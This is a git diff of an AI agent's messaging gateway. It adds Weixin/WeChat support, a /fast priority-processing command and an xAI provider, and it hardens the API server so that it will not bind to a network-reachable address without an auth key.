if elapsed >= 60:
_m, _s = int(elapsed // 60), int(elapsed % 60)
elapsed_str = f"{_m}m {_s}s"
else:
elapsed_str = f"{elapsed:.1f}s"
return [('class:hint', f' {txt} ({elapsed_str})')]
return [('class:hint', f' {txt}')]
def get_spinner_height():
@@ -8874,6 +8916,7 @@ class HermesCLI:
finally:
self._agent_running = False
self._spinner_text = ""
self._tool_start_time = 0.0
app.invalidate() # Refresh status line
+2 -1
View File
@@ -44,7 +44,7 @@ logger = logging.getLogger(__name__)
_KNOWN_DELIVERY_PLATFORMS = frozenset({
"telegram", "discord", "slack", "whatsapp", "signal",
"matrix", "mattermost", "homeassistant", "dingtalk", "feishu",
"wecom", "sms", "email", "webhook", "bluebubbles",
"wecom", "weixin", "sms", "email", "webhook", "bluebubbles",
})
from cron.jobs import get_due_jobs, mark_job_run, save_job_output, advance_next_run
@@ -234,6 +234,7 @@ def _deliver_result(job: dict, content: str, adapters=None, loop=None) -> Option
"dingtalk": Platform.DINGTALK,
"feishu": Platform.FEISHU,
"wecom": Platform.WECOM,
"weixin": Platform.WEIXIN,
"email": Platform.EMAIL,
"sms": Platform.SMS,
"bluebubbles": Platform.BLUEBUBBLES,
+4 -1
View File
@@ -9,7 +9,10 @@ INSTALL_DIR="/opt/hermes"
# (cache/images, cache/audio, platforms/whatsapp, etc.) are created on
# demand by the application — don't pre-create them here so new installs
# get the consolidated layout from get_hermes_dir().
mkdir -p "$HERMES_HOME"/{cron,sessions,logs,hooks,memories,skills}
# The "home/" subdirectory is a per-profile HOME for subprocesses (git,
# ssh, gh, npm …). Without it those tools write to /root which is
# ephemeral and shared across profiles. See issue #4426.
mkdir -p "$HERMES_HOME"/{cron,sessions,logs,hooks,memories,skills,home}
# .env
if [ ! -f "$HERMES_HOME/.env" ]; then
+1 -1
View File
@@ -77,7 +77,7 @@ def build_channel_directory(adapters: Dict[Any, Any]) -> Dict[str, Any]:
logger.warning("Channel directory: failed to build %s: %s", platform.value, e)
# Telegram, WhatsApp & Signal can't enumerate chats -- pull from session history
for plat_name in ("telegram", "whatsapp", "signal", "email", "sms", "bluebubbles"):
for plat_name in ("telegram", "whatsapp", "signal", "weixin", "email", "sms", "bluebubbles"):
if plat_name not in platforms:
platforms[plat_name] = _build_from_sessions(plat_name)
+45
View File
@@ -63,6 +63,7 @@ class Platform(Enum):
WEBHOOK = "webhook"
FEISHU = "feishu"
WECOM = "wecom"
WEIXIN = "weixin"
BLUEBUBBLES = "bluebubbles"
@@ -261,6 +262,11 @@ class GatewayConfig:
for platform, config in self.platforms.items():
if not config.enabled:
continue
# Weixin requires both a token and an account_id
if platform == Platform.WEIXIN:
if config.extra.get("account_id") and (config.token or config.extra.get("token")):
connected.append(platform)
continue
# Platforms that use token/api_key auth
if config.token or config.api_key:
connected.append(platform)
@@ -674,6 +680,7 @@ def load_gateway_config() -> GatewayConfig:
Platform.SLACK: "SLACK_BOT_TOKEN",
Platform.MATTERMOST: "MATTERMOST_TOKEN",
Platform.MATRIX: "MATRIX_ACCESS_TOKEN",
Platform.WEIXIN: "WEIXIN_TOKEN",
}
for platform, pconfig in config.platforms.items():
if not pconfig.enabled:
@@ -978,6 +985,44 @@ def _apply_env_overrides(config: GatewayConfig) -> None:
name=os.getenv("WECOM_HOME_CHANNEL_NAME", "Home"),
)
# Weixin (personal WeChat via iLink Bot API)
weixin_token = os.getenv("WEIXIN_TOKEN")
weixin_account_id = os.getenv("WEIXIN_ACCOUNT_ID")
if weixin_token or weixin_account_id:
if Platform.WEIXIN not in config.platforms:
config.platforms[Platform.WEIXIN] = PlatformConfig()
config.platforms[Platform.WEIXIN].enabled = True
if weixin_token:
config.platforms[Platform.WEIXIN].token = weixin_token
extra = config.platforms[Platform.WEIXIN].extra
if weixin_account_id:
extra["account_id"] = weixin_account_id
weixin_base_url = os.getenv("WEIXIN_BASE_URL", "").strip()
if weixin_base_url:
extra["base_url"] = weixin_base_url.rstrip("/")
weixin_cdn_base_url = os.getenv("WEIXIN_CDN_BASE_URL", "").strip()
if weixin_cdn_base_url:
extra["cdn_base_url"] = weixin_cdn_base_url.rstrip("/")
weixin_dm_policy = os.getenv("WEIXIN_DM_POLICY", "").strip().lower()
if weixin_dm_policy:
extra["dm_policy"] = weixin_dm_policy
weixin_group_policy = os.getenv("WEIXIN_GROUP_POLICY", "").strip().lower()
if weixin_group_policy:
extra["group_policy"] = weixin_group_policy
weixin_allowed_users = os.getenv("WEIXIN_ALLOWED_USERS", "").strip()
if weixin_allowed_users:
extra["allow_from"] = weixin_allowed_users
weixin_group_allowed_users = os.getenv("WEIXIN_GROUP_ALLOWED_USERS", "").strip()
if weixin_group_allowed_users:
extra["group_allow_from"] = weixin_group_allowed_users
weixin_home = os.getenv("WEIXIN_HOME_CHANNEL", "").strip()
if weixin_home:
config.platforms[Platform.WEIXIN].home_channel = HomeChannel(
platform=Platform.WEIXIN,
chat_id=weixin_home,
name=os.getenv("WEIXIN_HOME_CHANNEL_NAME", "Home"),
)
# BlueBubbles (iMessage)
bluebubbles_server_url = os.getenv("BLUEBUBBLES_SERVER_URL")
bluebubbles_password = os.getenv("BLUEBUBBLES_PASSWORD")
+14 -2
View File
@@ -25,6 +25,7 @@ import hmac
import json
import logging
import os
import socket as _socket
import re
import sqlite3
import time
@@ -42,6 +43,7 @@ from gateway.config import Platform, PlatformConfig
from gateway.platforms.base import (
BasePlatformAdapter,
SendResult,
is_network_accessible,
)
logger = logging.getLogger(__name__)
@@ -53,6 +55,7 @@ MAX_STORED_RESPONSES = 100
MAX_REQUEST_BYTES = 1_000_000 # 1 MB default limit for POST bodies
def check_api_server_requirements() -> bool:
"""Check if API server dependencies are available."""
return AIOHTTP_AVAILABLE
@@ -406,7 +409,8 @@ class APIServerAdapter(BasePlatformAdapter):
Validate Bearer token from Authorization header.
Returns None if auth is OK, or a 401 web.Response on failure.
If no API key is configured, all requests are allowed.
If no API key is configured, all requests are allowed (only when API
server is local)
"""
if not self._api_key:
return None # No key configured — allow all (local-only use)
@@ -1713,8 +1717,16 @@ class APIServerAdapter(BasePlatformAdapter):
if hasattr(sweep_task, "add_done_callback"):
sweep_task.add_done_callback(self._background_tasks.discard)
# Refuse to start network-accessible without authentication
if is_network_accessible(self._host) and not self._api_key:
logger.error(
"[%s] Refusing to start: binding to %s requires API_SERVER_KEY. "
"Set API_SERVER_KEY or use the default 127.0.0.1.",
self.name, self._host,
)
return False
# Port conflict detection — fail fast if port is already in use
import socket as _socket
try:
with _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM) as _s:
_s.settimeout(1)
+40
View File
@@ -6,10 +6,12 @@ and implement the required methods.
"""
import asyncio
import ipaddress
import logging
import os
import random
import re
import socket as _socket
import subprocess
import sys
import uuid
@@ -19,6 +21,41 @@ from urllib.parse import urlsplit
logger = logging.getLogger(__name__)
def is_network_accessible(host: str) -> bool:
"""Return True if *host* would expose the server beyond loopback.
Loopback addresses (127.0.0.1, ::1, IPv4-mapped ::ffff:127.0.0.1)
are local-only. Unspecified addresses (0.0.0.0, ::) bind all
interfaces. Hostnames are resolved; DNS failure fails closed.
"""
try:
addr = ipaddress.ip_address(host)
if addr.is_loopback:
return False
# ::ffff:127.0.0.1 — Python reports is_loopback=False for mapped
# addresses, so check the underlying IPv4 explicitly.
if getattr(addr, "ipv4_mapped", None) and addr.ipv4_mapped.is_loopback:
return False
return True
except ValueError:
# when host variable is a hostname, we should try to resolve below
pass
try:
resolved = _socket.getaddrinfo(
host, None, _socket.AF_UNSPEC, _socket.SOCK_STREAM,
)
# if the hostname resolves into at least one non-loopback address,
# then we consider it to be network accessible
for _family, _type, _proto, _canonname, sockaddr in resolved:
addr = ipaddress.ip_address(sockaddr[0])
if not addr.is_loopback:
return True
return False
except (_socket.gaierror, OSError):
return True
def _detect_macos_system_proxy() -> str | None:
"""Read the macOS system HTTP(S) proxy via ``scutil --proxy``.
@@ -613,6 +650,9 @@ class MessageEvent:
raw = parts[0][1:].lower() if parts else None
if raw and "@" in raw:
raw = raw.split("@", 1)[0]
# Reject file paths: valid command names never contain /
if raw and "/" in raw:
return None
return raw
def get_command_args(self) -> str:
+26 -13
View File
@@ -606,22 +606,35 @@ class DiscordAdapter(BasePlatformAdapter):
if not self._client.user or self._client.user not in message.mentions:
return
# "all" falls through to handle_message
# If the message @mentions other users but NOT the bot, the
# sender is talking to someone else — stay silent. Only
# applies in server channels; in DMs the user is always
# talking to the bot (mentions are just references).
# Controlled by DISCORD_IGNORE_NO_MENTION (default: true).
_ignore_no_mention = os.getenv(
"DISCORD_IGNORE_NO_MENTION", "true"
).lower() in ("true", "1", "yes")
if _ignore_no_mention and message.mentions and not isinstance(message.channel, discord.DMChannel):
_bot_mentioned = (
# Multi-agent filtering: if the message mentions specific bots
# but NOT this bot, the sender is talking to another agent —
# stay silent. Messages with no bot mentions (general chat)
# still fall through to _handle_message for the existing
# DISCORD_REQUIRE_MENTION check.
#
# This replaces the older DISCORD_IGNORE_NO_MENTION logic
# with bot-aware filtering that works correctly when multiple
# agents share a channel.
if not isinstance(message.channel, discord.DMChannel) and message.mentions:
_self_mentioned = (
self._client.user is not None
and self._client.user in message.mentions
)
if not _bot_mentioned:
return # Talking to someone else, don't interrupt
_other_bots_mentioned = any(
m.bot and m != self._client.user
for m in message.mentions
)
# If other bots are mentioned but we're not → not for us
if _other_bots_mentioned and not _self_mentioned:
return
# If humans are mentioned but we're not → not for us
# (preserves old DISCORD_IGNORE_NO_MENTION=true behavior)
_ignore_no_mention = os.getenv(
"DISCORD_IGNORE_NO_MENTION", "true"
).lower() in ("true", "1", "yes")
if _ignore_no_mention and not _self_mentioned and not _other_bots_mentioned:
return
await self._handle_message(message)
+1 -1
View File
@@ -2802,5 +2802,5 @@ class TelegramAdapter(BasePlatformAdapter):
await self._set_reaction(
chat_id,
message_id,
"\u2705" if outcome == ProcessingOutcome.SUCCESS else "\u274c",
"\U0001f44d" if outcome == ProcessingOutcome.SUCCESS else "\U0001f44e",
)
+1
View File
@@ -201,6 +201,7 @@ class WebhookAdapter(BasePlatformAdapter):
"dingtalk",
"feishu",
"wecom",
"weixin",
"bluebubbles",
):
return await self._deliver_cross_platform(
File diff suppressed because it is too large Load Diff
+129 -2
View File
@@ -481,6 +481,7 @@ class GatewayRunner:
self._prefill_messages = self._load_prefill_messages()
self._ephemeral_system_prompt = self._load_ephemeral_system_prompt()
self._reasoning_config = self._load_reasoning_config()
self._service_tier = self._load_service_tier()
self._show_reasoning = self._load_show_reasoning()
self._provider_routing = self._load_provider_routing()
self._fallback_model = self._load_fallback_model()
@@ -776,6 +777,7 @@ class GatewayRunner:
def _resolve_turn_agent_config(self, user_message: str, model: str, runtime_kwargs: dict) -> dict:
from agent.smart_model_routing import resolve_turn_route
from hermes_cli.models import resolve_fast_mode_overrides
primary = {
"model": model,
@@ -787,7 +789,19 @@ class GatewayRunner:
"args": list(runtime_kwargs.get("args") or []),
"credential_pool": runtime_kwargs.get("credential_pool"),
}
return resolve_turn_route(user_message, getattr(self, "_smart_model_routing", {}), primary)
route = resolve_turn_route(user_message, getattr(self, "_smart_model_routing", {}), primary)
service_tier = getattr(self, "_service_tier", None)
if not service_tier:
route["request_overrides"] = None
return route
try:
overrides = resolve_fast_mode_overrides(route.get("model"))
except Exception:
overrides = None
route["request_overrides"] = overrides
return route
async def _handle_adapter_fatal_error(self, adapter: BasePlatformAdapter) -> None:
"""React to an adapter failure after startup.
@@ -939,6 +953,33 @@ class GatewayRunner:
logger.warning("Unknown reasoning_effort '%s', using default (medium)", effort)
return result
@staticmethod
def _load_service_tier() -> str | None:
"""Load Priority Processing setting from config.yaml.
Reads agent.service_tier from config.yaml. Accepted values mirror the CLI:
"fast"/"priority"/"on" => "priority", while "normal"/"off" disables it.
Returns None when unset or unsupported.
"""
raw = ""
try:
import yaml as _y
cfg_path = _hermes_home / "config.yaml"
if cfg_path.exists():
with open(cfg_path, encoding="utf-8") as _f:
cfg = _y.safe_load(_f) or {}
raw = str(cfg.get("agent", {}).get("service_tier", "") or "").strip()
except Exception:
pass
value = raw.lower()
if not value or value in {"normal", "default", "standard", "off", "none"}:
return None
if value in {"fast", "priority", "on"}:
return "priority"
logger.warning("Unknown service_tier '%s', ignoring", raw)
return None
@staticmethod
def _load_show_reasoning() -> bool:
"""Load show_reasoning toggle from config.yaml display section."""
@@ -1069,6 +1110,7 @@ class GatewayRunner:
"MATRIX_ALLOWED_USERS", "DINGTALK_ALLOWED_USERS",
"FEISHU_ALLOWED_USERS",
"WECOM_ALLOWED_USERS",
"WEIXIN_ALLOWED_USERS",
"BLUEBUBBLES_ALLOWED_USERS",
"GATEWAY_ALLOWED_USERS")
)
@@ -1081,6 +1123,7 @@ class GatewayRunner:
"MATRIX_ALLOW_ALL_USERS", "DINGTALK_ALLOW_ALL_USERS",
"FEISHU_ALLOW_ALL_USERS",
"WECOM_ALLOW_ALL_USERS",
"WEIXIN_ALLOW_ALL_USERS",
"BLUEBUBBLES_ALLOW_ALL_USERS")
)
if not _any_allowlist and not _allow_all:
@@ -1622,6 +1665,13 @@ class GatewayRunner:
return None
return WeComAdapter(config)
elif platform == Platform.WEIXIN:
from gateway.platforms.weixin import WeixinAdapter, check_weixin_requirements
if not check_weixin_requirements():
logger.warning("Weixin: aiohttp/cryptography not installed")
return None
return WeixinAdapter(config)
elif platform == Platform.MATTERMOST:
from gateway.platforms.mattermost import MattermostAdapter, check_mattermost_requirements
if not check_mattermost_requirements():
@@ -1697,6 +1747,7 @@ class GatewayRunner:
Platform.DINGTALK: "DINGTALK_ALLOWED_USERS",
Platform.FEISHU: "FEISHU_ALLOWED_USERS",
Platform.WECOM: "WECOM_ALLOWED_USERS",
Platform.WEIXIN: "WEIXIN_ALLOWED_USERS",
Platform.BLUEBUBBLES: "BLUEBUBBLES_ALLOWED_USERS",
}
platform_allow_all_map = {
@@ -1712,6 +1763,7 @@ class GatewayRunner:
Platform.DINGTALK: "DINGTALK_ALLOW_ALL_USERS",
Platform.FEISHU: "FEISHU_ALLOW_ALL_USERS",
Platform.WECOM: "WECOM_ALLOW_ALL_USERS",
Platform.WEIXIN: "WEIXIN_ALLOW_ALL_USERS",
Platform.BLUEBUBBLES: "BLUEBUBBLES_ALLOW_ALL_USERS",
}
@@ -2077,6 +2129,9 @@ class GatewayRunner:
if canonical == "reasoning":
return await self._handle_reasoning_command(event)
if canonical == "fast":
return await self._handle_fast_command(event)
if canonical == "verbose":
return await self._handle_verbose_command(event)
@@ -3850,6 +3905,7 @@ class GatewayRunner:
# Resolve current provider from config
current_provider = "openrouter"
model_cfg = {}
config_path = _hermes_home / 'config.yaml'
try:
if config_path.exists():
@@ -4590,6 +4646,7 @@ class GatewayRunner:
max_iterations = int(os.getenv("HERMES_MAX_ITERATIONS", "90"))
reasoning_config = self._load_reasoning_config()
self._reasoning_config = reasoning_config
self._service_tier = self._load_service_tier()
turn_route = self._resolve_turn_agent_config(prompt, model, runtime_kwargs)
def run_sync():
@@ -4601,6 +4658,8 @@ class GatewayRunner:
verbose_logging=False,
enabled_toolsets=enabled_toolsets,
reasoning_config=reasoning_config,
service_tier=self._service_tier,
request_overrides=turn_route.get("request_overrides"),
providers_allowed=pr.get("only"),
providers_ignored=pr.get("ignore"),
providers_order=pr.get("order"),
@@ -4750,6 +4809,7 @@ class GatewayRunner:
model = _resolve_gateway_model(user_config)
platform_key = _platform_config_key(source.platform)
reasoning_config = self._load_reasoning_config()
self._service_tier = self._load_service_tier()
turn_route = self._resolve_turn_agent_config(question, model, runtime_kwargs)
pr = self._provider_routing
@@ -4776,6 +4836,8 @@ class GatewayRunner:
verbose_logging=False,
enabled_toolsets=[],
reasoning_config=reasoning_config,
service_tier=self._service_tier,
request_overrides=turn_route.get("request_overrides"),
providers_allowed=pr.get("only"),
providers_ignored=pr.get("ignore"),
providers_order=pr.get("order"),
@@ -4929,6 +4991,66 @@ class GatewayRunner:
else:
return f"🧠 ✓ Reasoning effort set to `{effort}` (this session only)"
async def _handle_fast_command(self, event: MessageEvent) -> str:
"""Handle /fast — mirror the CLI Priority Processing toggle in gateway chats."""
import yaml
from hermes_cli.models import model_supports_fast_mode
args = event.get_command_args().strip().lower()
config_path = _hermes_home / "config.yaml"
self._service_tier = self._load_service_tier()
user_config = _load_gateway_config()
model = _resolve_gateway_model(user_config)
if not model_supports_fast_mode(model):
return "⚡ /fast is only available for OpenAI models that support Priority Processing."
def _save_config_key(key_path: str, value):
"""Save a dot-separated key to config.yaml."""
try:
user_config = {}
if config_path.exists():
with open(config_path, encoding="utf-8") as f:
user_config = yaml.safe_load(f) or {}
keys = key_path.split(".")
current = user_config
for k in keys[:-1]:
if k not in current or not isinstance(current[k], dict):
current[k] = {}
current = current[k]
current[keys[-1]] = value
atomic_yaml_write(config_path, user_config)
return True
except Exception as e:
logger.error("Failed to save config key %s: %s", key_path, e)
return False
if not args or args == "status":
status = "fast" if self._service_tier == "priority" else "normal"
return (
"⚡ Priority Processing\n\n"
f"Current mode: `{status}`\n\n"
"_Usage:_ `/fast <normal|fast|status>`"
)
if args in {"fast", "on"}:
self._service_tier = "priority"
saved_value = "fast"
label = "FAST"
elif args in {"normal", "off"}:
self._service_tier = None
saved_value = "normal"
label = "NORMAL"
else:
return (
f"⚠️ Unknown argument: `{args}`\n\n"
"**Valid options:** normal, fast, status"
)
if _save_config_key("agent.service_tier", saved_value):
return f"⚡ ✓ Priority Processing: **{label}** (saved to config)\n_(takes effect on next message)_"
return f"⚡ ✓ Priority Processing: **{label}** (this session only)"
async def _handle_yolo_command(self, event: MessageEvent) -> str:
"""Handle /yolo — toggle dangerous command approval bypass for this session only."""
from tools.approval import (
@@ -5610,7 +5732,7 @@ class GatewayRunner:
Platform.TELEGRAM, Platform.DISCORD, Platform.SLACK, Platform.WHATSAPP,
Platform.SIGNAL, Platform.MATTERMOST, Platform.MATRIX,
Platform.HOMEASSISTANT, Platform.EMAIL, Platform.SMS, Platform.DINGTALK,
Platform.FEISHU, Platform.WECOM, Platform.BLUEBUBBLES, Platform.LOCAL,
Platform.FEISHU, Platform.WECOM, Platform.WEIXIN, Platform.BLUEBUBBLES, Platform.LOCAL,
})
async def _handle_update_command(self, event: MessageEvent) -> str:
@@ -6759,6 +6881,7 @@ class GatewayRunner:
pr = self._provider_routing
reasoning_config = self._load_reasoning_config()
self._reasoning_config = reasoning_config
self._service_tier = self._load_service_tier()
# Set up streaming consumer if enabled
_stream_consumer = None
_stream_delta_cb = None
@@ -6821,6 +6944,8 @@ class GatewayRunner:
ephemeral_system_prompt=combined_ephemeral or None,
prefill_messages=self._prefill_messages or None,
reasoning_config=reasoning_config,
service_tier=self._service_tier,
request_overrides=turn_route.get("request_overrides"),
providers_allowed=pr.get("only"),
providers_ignored=pr.get("ignore"),
providers_order=pr.get("order"),
@@ -6845,6 +6970,8 @@ class GatewayRunner:
agent.stream_delta_callback = _stream_delta_cb
agent.status_callback = _status_callback_sync
agent.reasoning_config = reasoning_config
agent.service_tier = self._service_tier
agent.request_overrides = turn_route.get("request_overrides")
# Background review delivery — send "💾 Memory updated" etc. to user
def _bg_review_send(message: str) -> None:
+20 -2
View File
@@ -198,6 +198,14 @@ PROVIDER_REGISTRY: Dict[str, ProviderConfig] = {
api_key_env_vars=("DEEPSEEK_API_KEY",),
base_url_env_var="DEEPSEEK_BASE_URL",
),
"xai": ProviderConfig(
id="xai",
name="xAI",
auth_type="api_key",
inference_base_url="https://api.x.ai/v1",
api_key_env_vars=("XAI_API_KEY",),
base_url_env_var="XAI_BASE_URL",
),
"ai-gateway": ProviderConfig(
id="ai-gateway",
name="AI Gateway",
@@ -890,7 +898,7 @@ def resolve_provider(
_PROVIDER_ALIASES = {
"glm": "zai", "z-ai": "zai", "z.ai": "zai", "zhipu": "zai",
"google": "gemini", "google-gemini": "gemini", "google-ai-studio": "gemini",
"kimi": "kimi-coding", "moonshot": "kimi-coding",
"kimi": "kimi-coding", "kimi-for-coding": "kimi-coding", "moonshot": "kimi-coding",
"minimax-china": "minimax-cn", "minimax_cn": "minimax-cn",
"claude": "anthropic", "claude-code": "anthropic",
"github": "copilot", "github-copilot": "copilot",
@@ -1513,7 +1521,15 @@ def _resolve_verify(
if effective_insecure:
return False
if effective_ca:
return str(effective_ca)
ca_path = str(effective_ca)
if not os.path.isfile(ca_path):
import logging
logging.getLogger("hermes.auth").warning(
"CA bundle path does not exist: %s — falling back to default certificates",
ca_path,
)
return True
return ca_path
return True
@@ -2616,6 +2632,8 @@ def _prompt_model_selection(
title=effective_title,
)
idx = menu.show()
from hermes_cli.curses_ui import flush_stdin
flush_stdin()
if idx is None:
return None
print()
+1 -1
View File
@@ -110,7 +110,7 @@ COMMAND_REGISTRY: list[CommandDef] = [
args_hint="[level|show|hide]",
subcommands=("none", "minimal", "low", "medium", "high", "xhigh", "show", "hide", "on", "off")),
CommandDef("fast", "Toggle fast mode — OpenAI Priority Processing / Anthropic Fast Mode (Normal/Fast)", "Configuration",
cli_only=True, args_hint="[normal|fast|status]",
args_hint="[normal|fast|status]",
subcommands=("normal", "fast", "status", "on", "off")),
CommandDef("skin", "Show or change the display skin/theme", "Configuration",
cli_only=True, args_hint="[name]"),
+6 -3
View File
@@ -39,6 +39,9 @@ _EXTRA_ENV_KEYS = frozenset({
"DINGTALK_CLIENT_ID", "DINGTALK_CLIENT_SECRET",
"FEISHU_APP_ID", "FEISHU_APP_SECRET", "FEISHU_ENCRYPT_KEY", "FEISHU_VERIFICATION_TOKEN",
"WECOM_BOT_ID", "WECOM_SECRET",
"WEIXIN_ACCOUNT_ID", "WEIXIN_TOKEN", "WEIXIN_BASE_URL", "WEIXIN_CDN_BASE_URL",
"WEIXIN_HOME_CHANNEL", "WEIXIN_HOME_CHANNEL_NAME", "WEIXIN_DM_POLICY", "WEIXIN_GROUP_POLICY",
"WEIXIN_ALLOWED_USERS", "WEIXIN_GROUP_ALLOWED_USERS", "WEIXIN_ALLOW_ALL_USERS",
"BLUEBUBBLES_SERVER_URL", "BLUEBUBBLES_PASSWORD",
"TERMINAL_ENV", "TERMINAL_SSH_KEY", "TERMINAL_SSH_PORT",
"WHATSAPP_MODE", "WHATSAPP_ENABLED",
@@ -1206,8 +1209,8 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"API_SERVER_KEY": {
"description": "Bearer token for API server authentication. If empty, all requests are allowed (local use only).",
"prompt": "API server auth key (optional)",
"description": "Bearer token for API server authentication. Required for non-loopback binding; server refuses to start without it. On loopback (127.0.0.1), all requests are allowed if empty.",
"prompt": "API server auth key (required for network access)",
"url": None,
"password": True,
"category": "messaging",
@@ -1222,7 +1225,7 @@ OPTIONAL_ENV_VARS = {
"advanced": True,
},
"API_SERVER_HOST": {
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — requires API_SERVER_KEY for security.",
"description": "Host/bind address for the API server (default: 127.0.0.1). Use 0.0.0.0 for network access — server refuses to start without API_SERVER_KEY.",
"prompt": "API server host",
"url": None,
"password": False,
+23
View File
@@ -10,6 +10,28 @@ from typing import Callable, List, Optional, Set
from hermes_cli.colors import Colors, color
def flush_stdin() -> None:
"""Flush any stray bytes from the stdin input buffer.
Must be called after ``curses.wrapper()`` (or any terminal-mode library
like simple_term_menu) returns, **before** the next ``input()`` /
``getpass.getpass()`` call. ``curses.endwin()`` restores the terminal
but does NOT drain the OS input buffer leftover escape-sequence bytes
(from arrow keys, terminal mode-switch responses, or rapid keypresses)
remain buffered and silently get consumed by the next ``input()`` call,
corrupting user data (e.g. writing ``^[^[`` into .env files).
On non-TTY stdin (piped, redirected) or Windows, this is a no-op.
"""
try:
if not sys.stdin.isatty():
return
import termios
termios.tcflush(sys.stdin, termios.TCIFLUSH)
except Exception:
pass
def curses_checklist(
title: str,
items: List[str],
@@ -131,6 +153,7 @@ def curses_checklist(
return
curses.wrapper(_draw)
flush_stdin()
return result_holder[0] if result_holder[0] is not None else cancel_returns
except Exception:
+1
View File
@@ -119,6 +119,7 @@ def _configured_platforms() -> list[str]:
"dingtalk": "DINGTALK_CLIENT_ID",
"feishu": "FEISHU_APP_ID",
"wecom": "WECOM_BOT_ID",
"weixin": "WEIXIN_ACCOUNT_ID",
}
return [name for name, env in checks.items() if os.getenv(env)]
+151 -9
View File
@@ -251,18 +251,18 @@ SERVICE_DESCRIPTION = "Hermes Agent Gateway - Messaging Platform Integration"
def _profile_suffix() -> str:
"""Derive a service-name suffix from the current HERMES_HOME.
Returns ``""`` for the default ``~/.hermes``, the profile name for
``~/.hermes/profiles/<name>``, or a short hash for any other custom
HERMES_HOME path.
Returns ``""`` for the default root, the profile name for
``<root>/profiles/<name>``, or a short hash for any other path.
Works correctly in Docker (HERMES_HOME=/opt/data) and standard deployments.
"""
import hashlib
import re
from pathlib import Path as _Path
from hermes_constants import get_default_hermes_root
home = get_hermes_home().resolve()
default = (_Path.home() / ".hermes").resolve()
default = get_default_hermes_root().resolve()
if home == default:
return ""
# Detect ~/.hermes/profiles/<name> pattern → use the profile name
# Detect <root>/profiles/<name> pattern → use the profile name
profiles_root = (default / "profiles").resolve()
try:
rel = home.relative_to(profiles_root)
@@ -287,9 +287,9 @@ def _profile_arg(hermes_home: str | None = None) -> str:
service definition for a different user (e.g. system service).
"""
import re
from pathlib import Path as _Path
from hermes_constants import get_default_hermes_root
home = Path(hermes_home or str(get_hermes_home())).resolve()
default = (_Path.home() / ".hermes").resolve()
default = get_default_hermes_root().resolve()
if home == default:
return ""
profiles_root = (default / "profiles").resolve()
@@ -1624,6 +1624,12 @@ _PLATFORMS = [
"help": "Chat ID for scheduled results and notifications."},
],
},
{
"key": "weixin",
"label": "Weixin / WeChat",
"emoji": "💬",
"token_var": "WEIXIN_ACCOUNT_ID",
},
{
"key": "bluebubbles",
"label": "BlueBubbles (iMessage)",
@@ -1696,6 +1702,13 @@ def _platform_status(platform: dict) -> str:
if val or password or homeserver:
return "partially configured"
return "not configured"
if platform.get("key") == "weixin":
token = get_env_value("WEIXIN_TOKEN")
if val and token:
return "configured"
if val or token:
return "partially configured"
return "not configured"
if val:
return "configured"
return "not configured"
@@ -1799,7 +1812,7 @@ def _setup_standard_platform(platform: dict):
print_warning(" Open access enabled — anyone can use your bot!")
elif access_idx == 1:
print_success(" DM pairing mode — users will receive a code to request access.")
print_info(" Approve with: hermes pairing approve {platform} {code}")
print_info(" Approve with: hermes pairing approve <platform> <code>")
else:
print_info(" Skipped — configure later with 'hermes gateway setup'")
continue
@@ -1886,6 +1899,133 @@ def _is_service_running() -> bool:
return len(find_gateway_pids()) > 0
def _setup_weixin():
"""Interactive setup for Weixin / WeChat personal accounts."""
print()
print(color(" ─── 💬 Weixin / WeChat Setup ───", Colors.CYAN))
print()
print_info(" 1. Hermes will open Tencent iLink QR login in this terminal.")
print_info(" 2. Use WeChat to scan and confirm the QR code.")
print_info(" 3. Hermes will store the returned account_id/token in ~/.hermes/.env.")
print_info(" 4. This adapter supports native text, image, video, and document delivery.")
existing_account = get_env_value("WEIXIN_ACCOUNT_ID")
existing_token = get_env_value("WEIXIN_TOKEN")
if existing_account and existing_token:
print()
print_success("Weixin is already configured.")
if not prompt_yes_no(" Reconfigure Weixin?", False):
return
try:
from gateway.platforms.weixin import check_weixin_requirements, qr_login
except Exception as exc:
print_error(f" Weixin adapter import failed: {exc}")
print_info(" Install gateway dependencies first, then retry.")
return
if not check_weixin_requirements():
print_error(" Missing dependencies: Weixin needs aiohttp and cryptography.")
print_info(" Install them, then rerun `hermes gateway setup`.")
return
print()
if not prompt_yes_no(" Start QR login now?", True):
print_info(" Cancelled.")
return
import asyncio
try:
credentials = asyncio.run(qr_login(str(get_hermes_home())))
except KeyboardInterrupt:
print()
print_warning(" Weixin setup cancelled.")
return
except Exception as exc:
print_error(f" QR login failed: {exc}")
return
if not credentials:
print_warning(" QR login did not complete.")
return
account_id = credentials.get("account_id", "")
token = credentials.get("token", "")
base_url = credentials.get("base_url", "")
user_id = credentials.get("user_id", "")
save_env_value("WEIXIN_ACCOUNT_ID", account_id)
save_env_value("WEIXIN_TOKEN", token)
if base_url:
save_env_value("WEIXIN_BASE_URL", base_url)
save_env_value("WEIXIN_CDN_BASE_URL", get_env_value("WEIXIN_CDN_BASE_URL") or "https://novac2c.cdn.weixin.qq.com/c2c")
print()
access_choices = [
"Use DM pairing approval (recommended)",
"Allow all direct messages",
"Only allow listed user IDs",
"Disable direct messages",
]
access_idx = prompt_choice(" How should direct messages be authorized?", access_choices, 0)
if access_idx == 0:
save_env_value("WEIXIN_DM_POLICY", "pairing")
save_env_value("WEIXIN_ALLOW_ALL_USERS", "false")
save_env_value("WEIXIN_ALLOWED_USERS", "")
print_success(" DM pairing enabled.")
print_info(" Unknown DM users can request access and you approve them with `hermes pairing approve`.")
elif access_idx == 1:
save_env_value("WEIXIN_DM_POLICY", "open")
save_env_value("WEIXIN_ALLOW_ALL_USERS", "true")
save_env_value("WEIXIN_ALLOWED_USERS", "")
print_warning(" Open DM access enabled for Weixin.")
elif access_idx == 2:
default_allow = user_id or ""
allowlist = prompt(" Allowed Weixin user IDs (comma-separated)", default_allow, password=False).replace(" ", "")
save_env_value("WEIXIN_DM_POLICY", "allowlist")
save_env_value("WEIXIN_ALLOW_ALL_USERS", "false")
save_env_value("WEIXIN_ALLOWED_USERS", allowlist)
print_success(" Weixin allowlist saved.")
else:
save_env_value("WEIXIN_DM_POLICY", "disabled")
save_env_value("WEIXIN_ALLOW_ALL_USERS", "false")
save_env_value("WEIXIN_ALLOWED_USERS", "")
print_warning(" Direct messages disabled.")
print()
group_choices = [
"Disable group chats (recommended)",
"Allow all group chats",
"Only allow listed group chat IDs",
]
group_idx = prompt_choice(" How should group chats be handled?", group_choices, 0)
